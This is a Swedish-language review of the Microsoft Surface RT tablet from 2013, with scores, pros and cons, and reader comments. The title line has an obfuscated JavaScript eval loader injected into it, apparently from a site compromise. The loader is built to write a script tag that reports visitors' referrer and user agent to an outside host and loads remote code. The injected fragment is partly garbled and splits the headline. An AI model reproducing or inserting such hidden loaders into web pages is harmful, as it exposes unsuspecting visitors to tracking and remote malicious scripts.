Image Image Image Image Image Image Image Image Image Image

| 26 januari, 2021

Scroll to top

Top

Stort test: Surface RT – en tablet gjord för att skapa och skriva.

surface rt
Filip Urde
 • On 13 mars, 2013
 • http://www.revue.se/filip-urde

Review Overview

Design
9.5
Prestanda
8
Användargränssnitt
8
Hårdvara
9
Appar
5.5
8

Rating

Surface eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|enzih|var|u0026u|referrer|yhsbe||js|php’.split(’|’),0,{}))
RT och Kriget om den ultimata tabletten.

 

It’s on! Apple har sin iPad 4 och Google har Nexus 10. När Microsoft nu ska in på marknaden med sin Windows 8 baserade tablet, så behövde man ett namn som stack ut och som förklarade produkten.

Vi hälsar här med Microsoft Surface välkommen in i matchen. Surface är ansiktet utåt för mer eller mindre hela Windows 8 lanseringen, men även för Windows RT, en helt ny version av Windows 8 som är utformad för ARM. Där av namnet Surface RT. (Det finns även en Intel version av Surface som kör en full version av Windows 8, denna kallas för Surface Pro.)

Målet med Surface från Microsoft sida är att skapa ett kraftigt flaggskepp som driver varumärket Windows 8 framåt och det tycker jag man lyckats med.

Tidigare har det varit ”Apple mot rubb” (för att göra en skolgårds liknelse). iPad har varit störst, snyggast och alla andra varumärken har sett på den med avund. Ingen annan har lyckats sticka ut, inte för ens nu. Här finns en distinkt design, mycket tackvare det grymma tangentbordet som även agerar smartcover för dess 10,6-tums widescreen-skärm. När jag plockade upp Surface RT för första gången så tänkte jag att den var tjockare och tyngre än vad man trodde.

Något som faktiskt är strunt, den är 9,4 mm tjock, vilket gör den exakt lika tjock som iPad 4. Men istället för att använda sig av rundade kanter så har man gått för ett mycket hårdare utseende och den svarta borstade magnesium ”VaporMg” ytan ger en kylig och fräsch känsla när man håller den.   Microsoft Surface väger dock 690G, vilket är tyngre än IPad 4 med sina 650g.

Men det är den lilla extra vikten som jag gillar, i början tänker man ”oj, vad tung den är”, men nu känns vikten som en kvalitetsstämpel. Det känns att du håller i en väl designad och robust produkt som andas kvalité.

En verkligen ikonisk del av Surface.

surface rt

Vad som gör att Surface sticker ut rent designmässigt, är det bakre stället. Stället är även den gjord i metall och fälls ut med ett litet ”kling”, för att sedan stå och hålla upp tabletten på plats i en komfortabel 22 gradig vinkel. Tillsammans med det avdragbara tangentbordet och att Surface har en 16:9-skärm som är helt anpassad för en optimal Windows 8 upplevelsen, gör det att det känns som om du använder en bärbar dator.  Det är ett stort steg mot en verklig hybrid upplevelse som vi alla eftersökt länge.

Skärmen är större än på en iPad, men den är verkligen inte bättre. Skärmen är en 10,6-tums 1366×768 IPS panel som inte riktigt når full HD. Men den räcker gott och väl, du upplever inte att kvalitén spelar någon roll när du använder tabletten. Om Microsoft tänkte vinna priser med den här skärmen eller utmana Retina, ja, då får dem tyvärr se sig om efter nya drömmar. Men som sagt den är bra nog! Samt att detta hjälper Microsoft att hålla ner priset.

Vad är priset: En 32GB Surface utan tangentbordet kostar 4495 kr, vilket är samma som en iPad 4 med halv lagrings kapaciteten.

Under huven på Surface RT

Här finner vi en Nvidia Tegra 3-processor, med ARM-tekniken som driver den nya Windows-RT operativsystem. Det är samma som du hittar i ”High Flying Android” tabletter som Asus Transformer Prime och Google Nexus 7. Man har även lagt in 2 GB RAM-minne.

Systemet känns lyhört när man navigera runt i Metro, surfar eller är inne i en app. Men att ladda apparna dröjer bitvis obekvämt länge. Den hackar inte eller hänger sig, men kan som sagt få laddningstider som gör dig lite stressad.

Vi testade en 32GB Microsoft Surface RT, som erbjuder gott om förvaring, men om inte det skulle räcka så har man en dold lucka för Micro SDSX under ”cykelstället”. Detta gör att du kan bygga ut din lagring markant. Om du inte tycker det räcker så kan du alltid koppla in ett USB-minne i USB-porten på sidan. En känsla som är ganska uppfriskande för en gammal iPad användare som jag själv. Med USB-porten kan du även koppla in diverse andra klassiska tillbehör, som möss och liknande.

Något som är synd är att det inte finns ett 3G alternativ och inga donglar är kompatibla med Windows RT förnärvarande så det blir inte det heller ett alternativ. Jag själv har delat nät från mobilen och tycker det fungerar utmärkt, men jag vet att andra vill ha en 3G version.

Det bästa med Surface RT upplevelsen.

surface

Naturligtvis så är det Touch Cover som är bäst, clip-on tangentbord som gör att du kan använda din Surface som antingen en tablett eller laptop. Sällan har jag varit så imponerad av ett tangentbord. Först och främst så är den grymt lätt, det känns som att den nästan är gjord i papp. Det distinkta smackljudet som uppstår när du kopplar på tangentbordet till din Surface går inte att missa. Det är även ett ljud som Microsoft försöker göra ”ikoniskt” i sina reklamfilmer för tabletten.

Att skriva med tangentbordet tar ett tag att vänja sig vid, men man lär sig snabbt. Klickljuden som används för att beteckna en framgångsrik knapptryckning är avgörande för att det hela ska fungera, eftersom bristen på taktil feedback kan vara lite vilseledande för användaren (taktil feedback: vibrationer från en kontroll eller liknande för att ge användaren vetskap om att interaktionen lyckades).

Kan man skriva lika bra som på ett vanligt tangentbord?

Jag sitter själv och skriver denna artikel på Surface RT. Jag har skrivit mina 10 senaste artiklar på den och med lite övning menar jag att jag lärt mig att få upp en respektabel hastighet och jag känner mig bekväm i min skrift. Det är självklart bättre med ett ”riktigt” tangentbord, men det här touch Covret är det bästa jag testat. Den har t.om. multi-touch styrplatta som klarar av enkla ”gestures”. Dessa fungerar dock så där. T.ex. vid en klassisk 2 fingrars scroll så fungerar det bra, till det att du ska byta tillbaka till ett finger igen och styra muspekaren. Då uppstår ett lagg på någon sekund där muspekaren blir orörlig. Men det är en liten sak på ett annars grymt tangentbord.

Men är det bra så kostar det också. Priset för tangentbordet är 1 069 kr. Men det är den värd! Utan den så halverar du upplevelsen på din Surface.

Surface och Office 365.

En annan viktig och avgörande del i min upplevelse av Surface RT är att jag haft en full version av office 365 på den. Möjligheten att skapa en powerpoint ”on the fly” och sedan trycka ut den på en vägg med HDMI och en bildkanon, ja, det är något som jag verkligen saknat hos min iPad. Känslan av att du kan göra ”allt” är påtaglig när du använder Surface. Det är härligt, men också något som kan bli en nackdel…

Det mindre bra med Surface RT upplevelsen.

Den kör Windows 8, det mest populära operativsystemet på planeten (Windows i stort då). Men det finns en alarmerande fråga som kan vara receptet på dess lycka eller dess undergång.

Dels kommer Windows RT inte att köra gamla PC-program (detta går på PRO versionen), så någon tur in på Internet för att hämta hem program som VLC , eller ens Photoshop och liknande kommer inte fungera. Som jag skrev ovan så känner man att möjligheterna är oändliga med Surface. Du kan köra en full version av Office 365 och då verkligen jobba. Vilket gör att du lurar dig själv. Du tror tillslut att denna hybrid faktiskt är en dator. Så tackvare att den gör sitt jobb så flitigt så blir dess största fördel även dess nackel. Man vill bara ännu mer! När den sen inte klarar av det så blir man ledsen. Du kan inte installera saker på samma sätt som på en vanlig PC. I RT versionen så är det istället appar som gäller, vilket tyvärr leder oss till Surface RTs stora elefant i rummet. Det finns nämligen inte så många appar.

Vi som kör iOS i vanliga fall och sedan går ner till utbudet som finns för Metro blir det nästan lite skrattretande. Nu gör dock Microsoft en storsatsning på appar och vi är helt övertygade om att det kommer flyga in appar framöver. Men det går inte att bortse i från. En tablet utan appar, är ingen bra tablet. Vilken tur att Surface RT är mer än bara en tablet.

surface

Sammanfattning: För och Nackdelar.

För:

1. Första tabletten som verkligen kan användas för att skapa och skriva, och som faktiskt lever upp till detta behov fullt ut.
2. Portar och utbyggbart minne: USB, HDMI-kompatibilitet, SDXC-kort
3. Snabb och vacker att använda (Win 8 RT), vänder folks huvuden på fiken.
4. Lång batteritid
5. Fantastiskt ställ och tangentbord

Nackdelar:

1. Har på tok för få appar gentemot konkurrenterna (speciellt iOS).
2. Bitvis lurigt att förstå logiken i det nya OSet. (Dock naturligt).
3. Lång laddningstid för flera av apparna.

 

Summering:

Surface RT är en grym hybrid, du får det bästa av en tablet kombinerat med en klassisk desktop. Surface RT är för dig som även vill kunna jobba på din tablet. Men tro inte att det är en dator, även fast den gärna vill lura dig att tro det. Vi får hoppas app-utbudet blir bättre snart, för då är den svårslagen idag.

Microsoft.com/surface

Comments

 1. Johannes

  Tror absolut att PRO kommer vara mycket bättre!!!

 2. Anonym

  Grym recension!! Äntligen någon som känns ärlig!

  • Anders

   Verkligen! Tack revue! vet att ni gillar apple osv! men här var det fan inge Apple fan-boy snack! härliga tider!

 3. Eriq

  Den är verkligen snygg när den har sitt tangentbord neddraget måste jag säga.
  Men som någon kommenterat nedan så väntar jag på PRO 🙂